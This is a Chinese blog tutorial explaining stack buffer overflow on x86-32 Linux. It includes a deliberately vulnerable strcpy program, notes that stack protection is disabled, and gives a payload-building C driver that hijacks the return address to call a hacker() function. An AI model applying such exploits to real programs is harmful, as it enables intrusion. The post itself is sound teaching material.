x86-32-Linux下栈溢出攻击原理

于 2023-10-28 11:05:26 发布
阅读量289 收藏 4
点赞数 1
分类专栏: Linux学习 文章标签: linux 栈溢出攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43580151/article/details/134088777
版权

在x86-32-Linux下构造一个栈溢出攻击

栈缓冲区溢出攻击:向栈上的数组写入超过数组长度的数据导致覆盖到正常数据{栈帧上的返回地址}。

IA-32下C函数调用约定:

  1. 调用者将参数从右向左入栈,构造参数
  2. call 指令短跳转,会将call指令下一条指令地址(RA)入栈,供RET指令返回使用
  3. 被调用函数创建栈帧,push %ebp; mov %esp, %ebp;

则一个函数调用的栈帧情况:

void func(int a,int b,int c) {
	int tmp = 0x99;
	return ;
}
void main() {
	func(1,2,3);
}
0x0参数C
0x4参数B
0x8参数A
0xCRA地址
0x10旧%ebp
0x14tmp变量值0x99

攻击原理: 利用strcpy(dst, src)函数,对写入的src数据长度不做检查的特性,对函数的栈数组进行写溢出攻击。

假设待写溢出的数组在test()中

// a.c
#include <stdio.h>
#include <string.h>

void test(char *str) {
        char buffer[16]; // 待攻击处
        strcpy(buffer, str);
        printf("%s\n", buffer);
}

void hacker(void) {
        printf("being hacked\n");
}

int main(int argc,char *argv[]) {
        test(argv[1]);
        return 0;
}

gcc a.c -o a.out 编译后,objdump -d a.out反汇编查看栈布局。

发现GCC对strcpy()的调用处插入栈检查代码call 8048398 <__stack_chk_fail@plt>.

首先关闭gcc的栈保护机制,gcc -o a.out -fno-stack-protector,查看反汇编发现没有了栈检查代码。

于是根据反汇编代码来得到test()的栈帧布局情况。
1

sub $0x28, %esp指令得知gcc给test()函数生成了0x28个字节大小的栈空间,布局如下。

并且通过传入strcpy()函数的buffer参数lea -0x18(%ebp), %eax得到buffer变量在栈上的起始地址

数组buffer的起始地址是-0x18(%ebp),于是便能够知道数组在栈帧的中的位置

%ebp+0x8参数 char *str
%ebp+0x4RA返回地址
%ebp当前的值,也就是test的栈底,0main的%ebp
%ebp-0x4
ebp-0x8
-0xCbuf 12~15
-0x10buf 8~11
-0x14buf 4~7
-0x18buf 0~3
-0x1C
%ebp-0x20
%ebp-0x24 = %esp + 0x4strcpy的参数:char *str
%ebp-0x28 = %espstrcpy的参数:buf地址=-0x18(%ebp)

既然有了buffer数组的位置,那么就能得到buffer数组到RA返回地址处的长度=16+3*4=28字节,28字节后面开始的 4字节便是需要构造的"攻击"跳转地址

假设我们想要其跳转到void hacker()函数,写入RA处为hacker()函数地址即可。反汇编查看hacker()函数的虚拟地址

2

有了hacker()函数地址,便能构造写溢出攻击字符串的内容了,28字节的垃圾字符+4字节hacker()函数地址+\0

代码如下:

// test.c
#include <unistd.h>
#include <stdio.h>

char tmp[33];

int main() {
        for (int i=0; i<28; i++)
                tmp[i] = 'F';
        // 对应hacker()地址 0x08048439
        tmp[28] = '\x39';
        tmp[29] = '\x84';
        tmp[30] = '\x04';
        tmp[31] = '\x08';
        tmp[32] = '\0';
        char *argv[3] = { "./a.out", tmp, NULL};

        execve(argv[0], argv, NULL);
        return 0;
}
// gcc a.c -fno-stack-protector -o a.out
// gcc test.c -o test -std=c99

./test运行结果如下:栈溢出攻击成功
3

总结

需要根据反汇编代码来查看函数栈中的变量的布局,然后根据栈变量布局再来构造溢出字符串。

1emerald
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker-compose-Linux-x86-64
05-26
docker-compose-Linux-x86-64
codelldb-x86-64-linux.vsix 下载,用于vscode 的LLDB 插件,用来debug调试 vscode
11-14
codelldb-x86_64-linux.vsix 下载,用于vscode 的LLDB 插件,用来debug调试 vscode,包括cpp、go、rust、c等语言
p6810189_10204_Linux-x86-64.part2.rar
08-17
oracle 10g 软件p6810189_10204_Linux-x86-64适用于Linux 64位系统,文件分割成 2个 压缩包,必须集齐2个 文件后才能一起解压一起使用: p6810189_10204_Linux-x86-64.part2.rar https://download.csdn.net/download/weixin_43800734/21113088 p6810189_10204_Linux-x86-64.part1.rar https://download.csdn.net/download/weixin_43800734/21113106
Miniconda3-latest-Linux-x86-64 miniconda安装包
05-10
Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-latest-Linux-x86_64 miniconda安装包Miniconda3-lates
cudnn-linux-x86-64-8.4.0.27-cuda11.6 cudnn linux cuda11.6版本包
05-10
nvida官网很难下载 故备份一下这是 文件太大拆成两个 这是第一个 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包
linux 栈溢出攻击原理,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(五)栈溢出原理...
weixin_30145205的博客
05-13 116
在前面的系列中,已经提到了方法调用关系中栈空间是如何布局的,而造成栈溢出的主要原因是有些函数没有越界检查,最后导致了栈的溢出,也就是栈的空间被人为的重新布局。大家重新在看这张栈的图 方法A调用方法B, 当B方法执行退出的时候,首先rbp指针指回方法A的函数入口地址,然后把rip 赋值到返回地址也就是当A call B的地址,而在图上返回地址就在B方法的调用栈的上方(栈是从高位到低位分配的),那么只...
linux 栈溢出
sky123博客
02-01 3608
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
linux线程堆栈溢出检测,GCC栈溢出检测技术
weixin_31129039的博客
05-12 1816
前一段时间在写ucontext的协程库的时候,遇到了栈空间溢出问题,然后就想到要研究一下堆栈溢出检测的相关技术。欢迎批评指正,如果对汇编有一个语法问题可以看我之前的一片文章,协程:posix::ucontext用户级线程实现原理分析中的汇编基础一节。首先我们直接看一段栈空间溢出的代码:1234567void bob(){int a[4]={0,1,2,3};*(a + 4) = 4;}int ma...
缓冲区溢出漏洞原理Linux下利用
热门推荐
江左盟的博客
12-26 1万+
常见保护措施 ASLR ASLR 是一种防范内存损坏漏洞被利用的计算机安全技术。ASLR通过随机放置进程关键数据区域的地址空间来防止攻击者能可靠地跳转到内存的特定位置来利用函数,以防范恶意程序对已知地址进行Return-to-libc攻击。ASLR在每次启动操作系统时会随机化加载应用程序的基地址和dll,只能随机化 堆、栈、共享库的基址。 Linux下查看: cat /proc/sys/kernel/randomize_va_space 值为0表示未开启,值为1表示半开启,仅随机化栈和共享库,值为2表示全
recv函数MSG_PEEK|MSG_DONTWAIT|MSG_OOB选项
_llc的博客
09-05 3849
send recv函数 ssize_t send(int sockfd,const void* buf,size_t nbytes,int flags); ssize_t recv(int sockfd,void* buf,size_t nbytes,int flags); 之前一直在linux下使用read和write函数, MSG_OOB:TCP只有紧急模式,没有带外数据 MSG_DONTWAIT:调用函数时不阻塞 MSG_PEEK:只有recv能用,检测input缓冲区是否有数据,(缓冲区数据不变
Debian下cpupower设置记录
_llc的博客
03-17 2416
Linux内核调频知识 链接 查看当前cpu调度器 cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor 查看cpu支持调度 cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors 查看当前cpu频率 cat /proc/cpuinfo | gre...
pthread_mutex_t的robust属性
_llc的博客
03-09 1972
mutex的robust属性 健壮属性与多个进程间共享互斥量有关 使用背景 多进程共享数据块同步时,持有互斥量的进程终止时,那么其他进程会一直阻塞下去(死锁),通过robust解决进程间一个mutex导致死锁的问题 // 获取\设置robust属性 pthread_mutexattr_getrobust(const pthread_mutexattr_t *restrict attr,int...
使用UNIX域Socket传递文件描述符
_llc的博客
11-18 1568
[使用UNIX域Socket传递文件描述符] 使用sendmsg(),recvmsg() fork后子进程继承父进程进程表象的描述符表(所有描述符项目),所以子进程和父进程相同的fd都共享了相同文件表象. 不同进程打开相同路径文件的情况: 操作文件的i节点是相同的,但是在内核文件表中维护了2个不同的文件表象(2个独立的进程), 2个进程间传递fd的目的就是使2个进程的fd共享一个相同的文件表项 ​ fork实现了父进程->子进程的fd传递, 独立进程间通过sendmsg/recv
linux下在进程中加载执行纯2进制可执行文件bin
_llc的博客
09-19 1277
此博客来自他人,下面是自己的见解,因为正好用到相关内容 objdump对纯2进制文件(hello.bin)反汇编 objdump -m i386 -b binary -D hello.bin -m:指出反汇编目标架构 -b:文件格式 在进程中加载执行纯2进制可执行文件bin mmap把2进制文件映射到进程用户内存空间, 将程序控制权交给bin linux下用汇编通过中断调用api打印一个hello world (nasm版本), [section .data] output: db "Hello
简单shell脚本重启mysql服务
_llc的博客
10-27 1153
shell脚本定时检测mariadb状态,实现崩溃后重启服务 检测mysql状态多种方法(监听端口之类), (centos7 systemctl中服务名称为mariadb也能用pgrep -x mysqld) 检测pgrep命令返回值 然后重启服务 # !/bin/bash time=$(date) pgrep -x mysqld &> /dev/null if [ $? ...
深入理解条件变量(虚假唤醒)
_llc的博客
03-06 969
深入条件变量 pthread_cond_wait()和pthread_cond_signal()的伪实现 pthread_cond_wait(mutex,cond) { // 保存条件变量的值 value = cond->value; // 解锁传入的已经锁住的互斥量 pthread_mutex_unlock(mutex); // 1 // 这里和pthread_cond_sig...
服务器内存小导致mysql服务停止解决方案+wordpress搭建
_llc的博客
08-04 865
wordpress搭建 域名现在要实名 买了国外服务器后(可以使用默认的dns服务器,一般都能解析),然后修改dns 解析设置,设置为服务器的ip 好像修改dns服务器要等几个小时才能成功 dig yourdomain或者nslookup youdomain查看是否域名解析到ip是否成功 lnmp环境搭建 安装 nginx mariadb php-fpm… nginx配置文件修改(写入内容是...
多线程并发简单聊天室实现
_llc的博客
09-12 779
多线程并发的简单聊天室实现 server:每一个clnt对应一个线程,将从线程接收到的消息都转发个所有已经建立连接的clnt, clnt:一个线程用来发送msg给server,一个 线程用来接受msg并输出到stdout server.c 使用了mutex建立临界区避免同时操作 #include <me.h> #define BUF_SIZE 100 #define MAX_CLNT 256 void *handle_clnt(void*);//线程处理函数 void send_ms
x86-64/linux的栈是多少字节对齐
最新发布
06-12
x86-64/linux的栈默认是以16字节对齐的。也就是说,栈上的任何数据都必须是16字节的倍数,否则会导致性能下降或者错误。这是因为x86-64处理器使用SSE和AVX指令集来进行向量运算,这些指令要求数据必须16字节对齐才能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值